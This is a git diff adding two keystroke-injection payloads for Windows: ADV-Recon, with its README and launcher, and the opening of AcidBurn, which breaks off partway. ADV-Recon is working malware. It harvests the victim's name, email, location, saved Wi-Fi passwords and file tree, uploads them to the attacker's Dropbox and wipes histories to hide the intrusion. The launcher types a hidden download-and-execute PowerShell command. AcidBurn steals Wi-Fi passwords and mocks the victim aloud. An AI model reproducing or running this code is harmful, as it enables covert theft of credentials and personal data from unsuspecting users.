diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1
new file mode 100644
index 0000000..9e64302
--- /dev/null
+++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1
@@ -0,0 +1,407 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ADV-Recon | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Recon | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+
+.SYNOPSIS
+ This is an advanced recon of a target PC and exfiltration of that data
+
+.DESCRIPTION
+ This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
+ All of the gather information is formatted neatly and output to a file
+ That file is then exfiltrated to cloud storage via DropBox
+
+.Link
+ https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
+#>
+
+############################################################################################################################################################
+
+$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
+
+############################################################################################################################################################
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$EM = Get-email
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GL = Get-GeoLocation
+
+############################################################################################################################################################
+
+# Get nearby wifi networks
+
+try
+{
+$NearbyWifi = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim()
+}
+catch
+{
+$NearbyWifi="No nearby wifi networks detected"
+}
+
+############################################################################################################################################################
+
+# Get info about pc
+
+# Get IP / Network Info
+try
+{
+$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+}
+catch
+{
+$computerPubIP="Error getting Public IP"
+}
+
+$computerIP = get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}
+
+############################################################################################################################################################
+
+$IsDHCPEnabled = $false
+$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
+foreach ($Network in $Networks) {
+If($network.DHCPEnabled) {
+$IsDHCPEnabled = $true
+ }
+$MAC = ipconfig /all | Select-String -Pattern "physical" | select-object -First 1; $MAC = [string]$MAC; $MAC = $MAC.Substring($MAC.Length - 17)
+}
+
+############################################################################################################################################################
+
+#Get System Info
+$computerSystem = Get-CimInstance CIM_ComputerSystem
+$computerBIOS = Get-CimInstance CIM_BIOSElement
+
+$computerOs=Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
+$computerCpu=Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
+$computerMainboard=Get-WmiObject Win32_BaseBoard | Format-List
+
+$computerRamCapacity=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
+$computerRam=Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table
+
+############################################################################################################################################################
+
+# Get HDDs
+$driveType = @{
+ 2="Removable disk "
+ 3="Fixed local disk "
+ 4="Network disk "
+ 5="Compact disk "}
+$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }
+
+#Get - Com & Serial Devices
+$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
+
+# Check RDP
+$RDP
+if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
+ $RDP = "RDP is Enabled"
+} else {
+ $RDP = "RDP is NOT enabled"
+}
+
+############################################################################################################################################################
+
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
+# Get wifi SSIDs and Passwords
+$WLANProfileNames =@()
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+}
+
+############################################################################################################################################################
+
+# local-user
+$luser=Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID
+
+# process first
+$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
+
+# Get Listeners / ActiveTcpConnections
+$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
+$listener = $listener | foreach-object {
+ $listenerItem = $_
+ $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
+ new-object PSObject -property @{
+ "LocalAddress" = $listenerItem.LocalAddress
+ "RemoteAddress" = $listenerItem.RemoteAddress
+ "State" = $listenerItem.State
+ "AppliedSetting" = $listenerItem.AppliedSetting
+ "OwningProcess" = $listenerItem.OwningProcess
+ "ProcessName" = $processItem.ProcessName
+ }
+} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table
+
+# process last
+$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine
+
+# service
+$service=Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName
+
+# installed software (get uninstaller)
+$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
+
+# drivers
+$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
+
+# videocard
+$videocard=Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution
+
+############################################################################################################################################################
+
+# MAKE LOOT FOLDER
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_computer_recon.txt"
+
+############################################################################################################################################################
+
+# OUTPUTS RESULTS TO LOOT FILE
+
+Clear-Host
+Write-Host
+
+echo "Name:" >> $env:TMP\$FileName
+echo "==================================================================" >> $env:TMP\$FileName
+echo $FN >> $env:TMP\$FileName
+echo "" >> $env:TMP\$FileName
+echo "Email:" >> $env:TMP\$FileName
+echo "==================================================================" >> $env:TMP\$FileName
+echo $EM >> $env:TMP\$FileName
+echo "" >> $env:TMP\$FileName
+echo "GeoLocation:" >> $env:TMP\$FileName
+echo "==================================================================" >> $env:TMP\$FileName
+echo $GL >> $env:TMP\$FileName
+echo "" >> $env:TMP\$FileName
+echo "Nearby Wifi:" >> $env:TMP\$FileName
+echo "==================================================================" >> $env:TMP\$FileName
+echo $NearbyWifi >> $env:TMP\$FileName
+echo "" >> $env:TMP\$FileName
+$computerSystem.Name >> $env:TMP\$FileName
+"==================================================================
+Manufacturer: " + $computerSystem.Manufacturer >> $env:TMP\$FileName
+"Model: " + $computerSystem.Model >> $env:TMP\$FileName
+"Serial Number: " + $computerBIOS.SerialNumber >> $env:TMP\$FileName
+"" >> $env:TMP\$FileName
+"" >> $env:TMP\$FileName
+"" >> $env:TMP\$FileName
+
+"OS:
+=================================================================="+ ($computerOs |out-string) >> $env:TMP\$FileName
+
+"CPU:
+=================================================================="+ ($computerCpu| out-string) >> $env:TMP\$FileName
+
+"RAM:
+==================================================================
+Capacity: " + $computerRamCapacity+ ($computerRam| out-string) >> $env:TMP\$FileName
+
+"Mainboard:
+=================================================================="+ ($computerMainboard| out-string) >> $env:TMP\$FileName
+
+"Bios:
+=================================================================="+ (Get-WmiObject win32_bios| out-string) >> $env:TMP\$FileName
+
+
+"Local-user:
+=================================================================="+ ($luser| out-string) >> $env:TMP\$FileName
+
+"HDDs:
+=================================================================="+ ($Hdds| out-string) >> $env:TMP\$FileName
+
+"COM & SERIAL DEVICES:
+==================================================================" + ($COMDevices | Out-String) >> $env:TMP\$FileName
+
+"Network:
+==================================================================
+Computers MAC address: " + $MAC >> $env:TMP\$FileName
+"Computers IP address: " + $computerIP.ipaddress[0] >> $env:TMP\$FileName
+"Public IP address: " + $computerPubIP >> $env:TMP\$FileName
+"RDP: " + $RDP >> $env:TMP\$FileName
+"" >> $env:TMP\$FileName
+($Network| out-string) >> $env:TMP\$FileName
+
+"W-Lan profiles:
+=================================================================="+ ($WLANProfileObjects| Out-String) >> $env:TMP\$FileName
+
+"listeners / ActiveTcpConnections
+=================================================================="+ ($listener| Out-String) >> $env:TMP\$FileName
+
+"Current running process:
+=================================================================="+ ($process| Out-String) >> $env:TMP\$FileName
+
+"Services:
+=================================================================="+ ($service| Out-String) >> $env:TMP\$FileName
+
+"Installed software:
+=================================================================="+ ($software| Out-String) >> $env:TMP\$FileName
+
+"Installed drivers:
+=================================================================="+ ($drivers| Out-String) >> $env:TMP\$FileName
+
+"Installed videocards:
+==================================================================" + ($videocard| Out-String) >> $env:TMP\$FileName
+
+
+############################################################################################################################################################
+
+# Recon all User Directories
+#tree $Env:userprofile /a /f | Out-File -FilePath $Env:tmp\j-loot\tree.txt
+tree $Env:userprofile /a /f >> $env:TMP\$FileName
+
+############################################################################################################################################################
+
+# Remove Variables
+
+Remove-Variable -Name computerPubIP,
+computerIP,IsDHCPEnabled,Network,Networks,
+computerMAC,computerSystem,computerBIOS,computerOs,
+computerCpu, computerMainboard,computerRamCapacity,
+computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,
+Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,
+process,listener,listenerItem,process,service,software,drivers,videocard,
+vault -ErrorAction SilentlyContinue -Force
+
+############################################################################################################################################################
+
+# Upload output file to dropbox
+
+$TargetFilePath="/$FileName"
+$SourceFilePath="$env:TMP\$FileName"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $DropBoxAccessToken
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+
+############################################################################################################################################################
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+
+
+
diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md
new file mode 100644
index 0000000..3bf6211
--- /dev/null
+++ b/Payloads/Flip-ADV-Recon/README.md
@@ -0,0 +1,100 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# ADV-Recon
+
+A script used to do an advanced level of Recon on the targets computer
+
+## Description
+
+This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
+The GeoLocation (latitude and longitude) of where the script was ran.
+The SSID and WiFi password of any current or previously connected to networks.
+It determines the last day they changed thier password and how many days ago.
+Intel on the system Info, HDDs, network interfaces, TCP connections, Processes, Services, Installed software, drivers, and video card
+Along with TREE list of all files in the target computer is gathered and uploaded to your DropBox cloud storage
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+ 
+
+
+ 
+
+
+
+ 
+
+
+
+ 
+
+
+
+ 
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ADV-Recon)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Flip-ADV-Recon/payload.txt b/Payloads/Flip-ADV-Recon/payload.txt
new file mode 100644
index 0000000..6f35cdf
--- /dev/null
+++ b/Payloads/Flip-ADV-Recon/payload.txt
@@ -0,0 +1,15 @@
+REM Title: ADV-Recon
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
+REM
+REM Target: Windows 10, 11
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
+REM
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/Payloads/Flip-AcidBurn/AcidBurn.ps1 b/Payloads/Flip-AcidBurn/AcidBurn.ps1
new file mode 100644
index 0000000..c9e711e
--- /dev/null
+++ b/Payloads/Flip-AcidBurn/AcidBurn.ps1
@@ -0,0 +1,704 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : AcidBurn | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby (youtube link with demonstration coming soon) # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn.
+
+.DESCRIPTION
+ This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
+ The SSID and WiFi password of any current or previously connected to networks.
+ It determines the last day they changed thier password and how many days ago.
+ Once the information is gathered the script will pause until a mouse movement is detected
+ Then the script uses Sapi speak to roast their set up and lack of security
+#>
+############################################################################################################################################################
+
+# Variables
+
+
+$s=New-Object -ComObject SAPI.SpVoice
+
+############################################################################################################################################################
+
+# Intro ---------------------------------------------------------------------------------------------------
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+# echo statement used to track progress while debugging
+echo "Intro Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ RAM Info
+ This will get the amount of RAM the target computer has
+#>
+
+
+function Get-RAM {
+
+ try {
+
+ $OS = (Get-WmiObject Win32_OperatingSystem).Name;$OSpos = $OS.IndexOf("|");$OS = $OS.Substring(0, $OSpos)
+
+ $RAM=Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1}" -f ($_.sum / 1GB)}
+ $RAMpos = $RAM.IndexOf('.')
+ $RAM = [int]$RAM.Substring(0,$RAMpos).Trim()
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $lowRAM = "$RAM gigs of ram? might as well use pen and paper"
+
+ $okRAM = "$RAM gigs of ram really? I have a calculator with more computing power"
+
+ $goodRAM = "$RAM gigs of ram? Can almost guarantee you have a light up keyboard.. you are a wanna be streamer huh?"
+
+ $impressiveRAM = "$RAM gigs of ram? are you serious? a super computer with no security that is funny right there"
+#----------------------------------------------------------------------------------------------------
+
+ if($RAM -le 4){
+ return $lowRAM
+ } elseif($RAM -ge 5 -and $RAM -le 12){
+ return $okRAM
+ } elseif($RAM -ge 13 -and $RAM -le 24){
+ return $goodRAM
+ } else {
+ return $impressiveRAM
+ }
+
+ }
+
+ # If one of the above parameters is not detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Error in search"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "RAM Info Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Public IP
+ This will get the public IP from the target computer
+#>
+
+
+function Get-PubIP {
+
+ try {
+
+ $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+
+ }
+
+ # If no Public IP is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No Public IP was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+ return "your public I P address is $computerPubIP"
+}
+
+# echo statement used to track progress while debugging
+echo "Pub IP Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Wifi Network and Password
+ This function will custom a tailor response based on how many characters long their password is
+#>
+
+
+function Get-Pass {
+
+ #-----VARIABLES-----#
+ # $pwl = their Pass Word Length
+ # $pass = their Password
+
+ try {
+
+ $pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro
+ $pos = $pro.IndexOf(':')
+ $pro = $pro.Substring($pos+2).Trim()
+
+ $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass
+ $passPOS = $pass.IndexOf(':')
+ $pass = $pass.Substring($passPOS+2).Trim()
+
+ if($pro -like '*_5GHz*') {
+ $pro = $pro.Trimend('_5GHz')
+ }
+
+ $pwl = $pass.length
+
+
+ }
+
+ # If no network is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No network was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+
+# ENTER YOUR CUSTOM RESPONSES HERE
+#----------------------------------------------------------------------------------------------------
+ $badPASS = "$pro is not a very creative name but at least it is not as bad as your wifi password... only $pwl characters long? $pass ...? really..? $pass was the best you could come up with?"
+
+ $okPASS = "$pro is not a very creative name but at least you are trying a little bit, your password is $pwl characters long, still trash though.. $pass ...? You can do better"
+
+ $goodPASS = "$pro is not a very creative name but At least you are not a total fool... $pwl character long password actually is not bad, but it did not save you from me did it? no..it..did..not! $pass is a decent password though."
+#----------------------------------------------------------------------------------------------------
+
+ if($pass.length -lt 8) { return $badPASS
+
+ }elseif($pass.length -gt 7 -and $pass.length -lt 12) { return $okPASS
+
+ }else { return $goodPASS
+
+ }
+}
+
+# echo statement used to track progress while debugging
+echo "Wifi pass Done"
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ All Wifi Networks and Passwords
+ This function will gather all current Networks and Passwords saved on the target computer
+ They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
+#>
+
+Function Get-Networks {
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
+# Get Wifi SSIDs and Passwords
+$WLANProfileNames =@()
+
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+ return $WLANProfileObjects
+}
+}
+
+$Networks = Get-Networks
+
+Add-Type @"
+using System;
+using System.Runtime.InteropServices;
+public class PInvoke {
+ [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
+ [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+}
+"@
+$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
+$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
+$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
+
+<#
+
+.NOTES
+ This will take the image you generated and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#############################################################################################################################################
+
+Function WallPaper-Troll {
+
+if (!$Networks) { Write-Host "variable is null"
+}else {
+
+ # This is the name of the file the networks and passwords are saved
+
+ $FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_WiFi-PWD.txt"
+
